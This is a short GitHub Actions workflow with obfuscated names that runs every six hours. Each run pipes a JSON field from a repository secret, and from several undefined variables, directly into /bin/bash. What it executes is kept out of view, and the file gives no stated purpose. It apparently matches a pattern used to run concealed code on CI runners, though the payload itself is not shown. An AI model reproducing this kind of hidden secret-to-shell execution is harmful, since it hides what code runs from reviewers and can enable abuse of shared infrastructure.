name: qinxunji4187
on:
  workflow_dispatch:
  schedule:
    - cron: '25 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: qinxunji4187
        env:
          bipsp7: ${{ secrets.bipsp7 }}
        run: |
          echo $bipsp7 | jq -r .qdsje73 | /bin/bash
          echo $kn1 | jq -r .gd384 | /bin/bash
          echo $wprng048 | jq -r .mq4915 | /bin/bash
          echo $nyme7262 | jq -r .a36434 | /bin/bash

